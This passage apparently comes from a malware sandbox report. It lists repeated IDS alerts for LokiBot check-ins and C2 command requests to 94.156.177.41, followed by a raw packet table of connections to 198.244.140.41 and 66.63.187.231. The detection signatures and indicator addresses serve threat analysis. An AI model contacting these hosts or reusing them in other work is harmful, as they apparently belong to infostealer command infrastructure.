                                                2024-11-20T10:13:01.807106+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926094.156.177.4180TCP
                                                2024-11-20T10:13:01.807106+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926094.156.177.4180TCP
                                                2024-11-20T10:13:02.699741+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926094.156.177.4180TCP
                                                2024-11-20T10:13:02.699741+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926094.156.177.4180TCP
                                                2024-11-20T10:13:02.706048+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249260TCP
                                                2024-11-20T10:13:02.864990+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926194.156.177.4180TCP
                                                2024-11-20T10:13:02.864990+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926194.156.177.4180TCP
                                                2024-11-20T10:13:02.864990+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926194.156.177.4180TCP
                                                2024-11-20T10:13:03.729524+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926194.156.177.4180TCP
                                                2024-11-20T10:13:03.729524+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926194.156.177.4180TCP
                                                2024-11-20T10:13:03.734512+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249261TCP
                                                2024-11-20T10:13:03.882271+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926294.156.177.4180TCP
                                                2024-11-20T10:13:03.882271+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926294.156.177.4180TCP
                                                2024-11-20T10:13:03.882271+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926294.156.177.4180TCP
                                                2024-11-20T10:13:04.648130+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926294.156.177.4180TCP
                                                2024-11-20T10:13:04.648130+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926294.156.177.4180TCP
                                                2024-11-20T10:13:04.655379+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249262TCP
                                                2024-11-20T10:13:04.788703+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926394.156.177.4180TCP
                                                2024-11-20T10:13:04.788703+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926394.156.177.4180TCP
                                                2024-11-20T10:13:04.788703+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926394.156.177.4180TCP
                                                2024-11-20T10:13:05.554936+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926394.156.177.4180TCP
                                                2024-11-20T10:13:05.554936+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926394.156.177.4180TCP
                                                2024-11-20T10:13:05.559942+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249263TCP
                                                2024-11-20T10:13:05.710359+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926494.156.177.4180TCP
                                                2024-11-20T10:13:05.710359+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926494.156.177.4180TCP
                                                2024-11-20T10:13:05.710359+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926494.156.177.4180TCP
                                                2024-11-20T10:13:06.564082+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926494.156.177.4180TCP
                                                2024-11-20T10:13:06.564082+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926494.156.177.4180TCP
                                                2024-11-20T10:13:06.568943+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249264TCP
                                                2024-11-20T10:13:06.715979+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926594.156.177.4180TCP
                                                2024-11-20T10:13:06.715979+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926594.156.177.4180TCP
                                                2024-11-20T10:13:06.715979+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926594.156.177.4180TCP
                                                2024-11-20T10:13:07.564936+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926594.156.177.4180TCP
                                                2024-11-20T10:13:07.564936+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926594.156.177.4180TCP
                                                2024-11-20T10:13:07.572722+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249265TCP
                                                2024-11-20T10:13:07.728341+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926694.156.177.4180TCP
                                                2024-11-20T10:13:07.728341+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926694.156.177.4180TCP
                                                2024-11-20T10:13:07.728341+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926694.156.177.4180TCP
                                                2024-11-20T10:13:08.449519+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926694.156.177.4180TCP
                                                2024-11-20T10:13:08.449519+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926694.156.177.4180TCP
                                                2024-11-20T10:13:08.454411+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249266TCP
                                                2024-11-20T10:13:08.595686+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926794.156.177.4180TCP
                                                2024-11-20T10:13:08.595686+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926794.156.177.4180TCP
                                                2024-11-20T10:13:08.595686+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926794.156.177.4180TCP
                                                2024-11-20T10:13:09.331162+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926794.156.177.4180TCP
                                                2024-11-20T10:13:09.331162+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926794.156.177.4180TCP
                                                2024-11-20T10:13:09.336370+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249267TCP
                                                2024-11-20T10:13:09.484579+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926894.156.177.4180TCP
                                                2024-11-20T10:13:09.484579+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926894.156.177.4180TCP
                                                2024-11-20T10:13:09.484579+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926894.156.177.4180TCP
                                                2024-11-20T10:13:10.215842+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926894.156.177.4180TCP
                                                2024-11-20T10:13:10.215842+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926894.156.177.4180TCP
                                                2024-11-20T10:13:10.224675+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249268TCP
                                                2024-11-20T10:13:10.364041+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224926994.156.177.4180TCP
                                                2024-11-20T10:13:10.364041+01002025381ET MALWARE LokiBot Checkin1192.168.2.224926994.156.177.4180TCP
                                                2024-11-20T10:13:10.364041+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224926994.156.177.4180TCP
                                                2024-11-20T10:13:11.234165+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224926994.156.177.4180TCP
                                                2024-11-20T10:13:11.234165+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224926994.156.177.4180TCP
                                                2024-11-20T10:13:11.239377+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249269TCP
                                                2024-11-20T10:13:11.382963+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927094.156.177.4180TCP
                                                2024-11-20T10:13:11.382963+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927094.156.177.4180TCP
                                                2024-11-20T10:13:11.382963+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927094.156.177.4180TCP
                                                2024-11-20T10:13:12.128276+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927094.156.177.4180TCP
                                                2024-11-20T10:13:12.128276+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927094.156.177.4180TCP
                                                2024-11-20T10:13:12.133372+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249270TCP
                                                2024-11-20T10:13:12.272453+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927194.156.177.4180TCP
                                                2024-11-20T10:13:12.272453+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927194.156.177.4180TCP
                                                2024-11-20T10:13:12.272453+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927194.156.177.4180TCP
                                                2024-11-20T10:13:13.149900+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927194.156.177.4180TCP
                                                2024-11-20T10:13:13.149900+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927194.156.177.4180TCP
                                                2024-11-20T10:13:13.154951+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249271TCP
                                                2024-11-20T10:13:13.292586+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927294.156.177.4180TCP
                                                2024-11-20T10:13:13.292586+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927294.156.177.4180TCP
                                                2024-11-20T10:13:13.292586+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927294.156.177.4180TCP
                                                2024-11-20T10:13:14.047995+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927294.156.177.4180TCP
                                                2024-11-20T10:13:14.047995+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927294.156.177.4180TCP
                                                2024-11-20T10:13:14.053593+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249272TCP
                                                2024-11-20T10:13:14.191871+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927394.156.177.4180TCP
                                                2024-11-20T10:13:14.191871+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927394.156.177.4180TCP
                                                2024-11-20T10:13:14.191871+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927394.156.177.4180TCP
                                                2024-11-20T10:13:14.921761+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927394.156.177.4180TCP
                                                2024-11-20T10:13:14.921761+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927394.156.177.4180TCP
                                                2024-11-20T10:13:14.931750+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249273TCP
                                                2024-11-20T10:13:15.065941+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927494.156.177.4180TCP
                                                2024-11-20T10:13:15.065941+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927494.156.177.4180TCP
                                                2024-11-20T10:13:15.065941+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927494.156.177.4180TCP
                                                2024-11-20T10:13:15.927413+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927494.156.177.4180TCP
                                                2024-11-20T10:13:15.927413+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927494.156.177.4180TCP
                                                2024-11-20T10:13:15.934392+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249274TCP
                                                2024-11-20T10:13:16.079240+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927594.156.177.4180TCP
                                                2024-11-20T10:13:16.079240+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927594.156.177.4180TCP
                                                2024-11-20T10:13:16.079240+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927594.156.177.4180TCP
                                                2024-11-20T10:13:16.829314+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927594.156.177.4180TCP
                                                2024-11-20T10:13:16.829314+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927594.156.177.4180TCP
                                                2024-11-20T10:13:16.839438+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249275TCP
                                                2024-11-20T10:13:17.017320+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927694.156.177.4180TCP
                                                2024-11-20T10:13:17.017320+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927694.156.177.4180TCP
                                                2024-11-20T10:13:17.017320+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927694.156.177.4180TCP
                                                2024-11-20T10:13:17.903807+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927694.156.177.4180TCP
                                                2024-11-20T10:13:17.903807+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927694.156.177.4180TCP
                                                2024-11-20T10:13:17.908765+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249276TCP
                                                2024-11-20T10:13:18.056702+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927794.156.177.4180TCP
                                                2024-11-20T10:13:18.056702+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927794.156.177.4180TCP
                                                2024-11-20T10:13:18.056702+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927794.156.177.4180TCP
                                                2024-11-20T10:13:18.831570+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927794.156.177.4180TCP
                                                2024-11-20T10:13:18.831570+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927794.156.177.4180TCP
                                                2024-11-20T10:13:18.840854+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249277TCP
                                                2024-11-20T10:13:18.985728+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927894.156.177.4180TCP
                                                2024-11-20T10:13:18.985728+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927894.156.177.4180TCP
                                                2024-11-20T10:13:18.985728+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927894.156.177.4180TCP
                                                2024-11-20T10:13:19.881369+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927894.156.177.4180TCP
                                                2024-11-20T10:13:19.881369+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927894.156.177.4180TCP
                                                2024-11-20T10:13:19.886547+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249278TCP
                                                2024-11-20T10:13:20.030600+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224927994.156.177.4180TCP
                                                2024-11-20T10:13:20.030600+01002025381ET MALWARE LokiBot Checkin1192.168.2.224927994.156.177.4180TCP
                                                2024-11-20T10:13:20.030600+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224927994.156.177.4180TCP
                                                2024-11-20T10:13:20.786261+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224927994.156.177.4180TCP
                                                2024-11-20T10:13:20.786261+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224927994.156.177.4180TCP
                                                2024-11-20T10:13:20.791119+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249279TCP
                                                2024-11-20T10:13:21.135705+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224928094.156.177.4180TCP
                                                2024-11-20T10:13:21.135705+01002025381ET MALWARE LokiBot Checkin1192.168.2.224928094.156.177.4180TCP
                                                2024-11-20T10:13:21.135705+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224928094.156.177.4180TCP
                                                2024-11-20T10:13:21.865363+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224928094.156.177.4180TCP
                                                2024-11-20T10:13:21.865363+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224928094.156.177.4180TCP
                                                2024-11-20T10:13:21.870501+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249280TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 20, 2024 10:11:02.515557051 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:02.515590906 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:02.515654087 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:02.570441008 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:02.570455074 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.193300009 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.193384886 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.201539993 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.201550007 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.201881886 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.201967001 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.367563963 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.415380001 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.532283068 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.532339096 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.532361984 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.532386065 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.532402039 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.532588005 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.538660049 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.538683891 CET44349161198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:03.538693905 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:03.538739920 CET49161443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.066611052 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.066642046 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.066742897 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.067153931 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.067169905 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.686850071 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.687128067 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.692554951 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.692563057 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.692960024 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.699629068 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.747334003 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.966545105 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.966633081 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:04.966715097 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.966715097 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.966785908 CET49162443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:04.966804981 CET44349162198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:08.357222080 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:08.357253075 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:08.357305050 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:08.358247995 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:08.358259916 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:08.983057022 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:08.983129025 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:08.988609076 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:08.988626957 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:08.989023924 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:09.009886980 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:09.055344105 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:09.270025969 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:09.270092964 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:09.270143986 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:09.270365953 CET49163443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:09.270394087 CET44349163198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:09.471806049 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:09.471852064 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:09.471906900 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:09.472238064 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:09.472254038 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.121526003 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.121628046 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.127126932 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.127142906 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.127542973 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.128344059 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.171344995 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.406816959 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.406903982 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.407267094 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.411257029 CET49164443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.411279917 CET44349164198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.427567005 CET49165443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.427628040 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:10.427686930 CET49165443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.427834988 CET49165443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:10.427855015 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.045557022 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.046159029 CET49165443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:11.046184063 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.046987057 CET49165443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:11.046991110 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.335602045 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.335675955 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.335722923 CET49165443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:11.335860968 CET49165443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:11.335882902 CET44349165198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.567214012 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:11.567275047 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:11.567332983 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:11.567698956 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:11.567719936 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:12.380634069 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:12.382275105 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:12.384047985 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:12.384062052 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:12.385391951 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:12.385399103 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:12.665195942 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:12.665746927 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:12.665903091 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:12.679307938 CET49166443192.168.2.22198.244.140.41
                                                Nov 20, 2024 10:11:12.679336071 CET44349166198.244.140.41192.168.2.22
                                                Nov 20, 2024 10:11:12.719888926 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:12.725147009 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:12.726214886 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:12.726342916 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:12.732362032 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454144001 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454161882 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454174995 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454252005 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.454328060 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454339981 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454349995 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454376936 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.454389095 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.454540968 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454551935 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454626083 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.454710960 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454721928 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.454757929 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.460696936 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.460830927 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.460844040 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.460859060 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.460875988 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.461191893 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.461244106 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.505033016 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.590362072 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.590383053 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.590394974 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.590434074 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.590466976 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.590509892 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.590570927 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.590611935 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.590625048 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.590672970 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.590672970 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.591048002 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.591105938 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.591358900 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.591413021 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.591432095 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.591444969 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.591469049 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.591484070 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.591720104 CET804916766.63.187.231192.168.2.22
                                                Nov 20, 2024 10:11:13.591770887 CET4916780192.168.2.2266.63.187.231
                                                Nov 20, 2024 10:11:13.592235088 CET804916766.63.187.231192.168.2.22
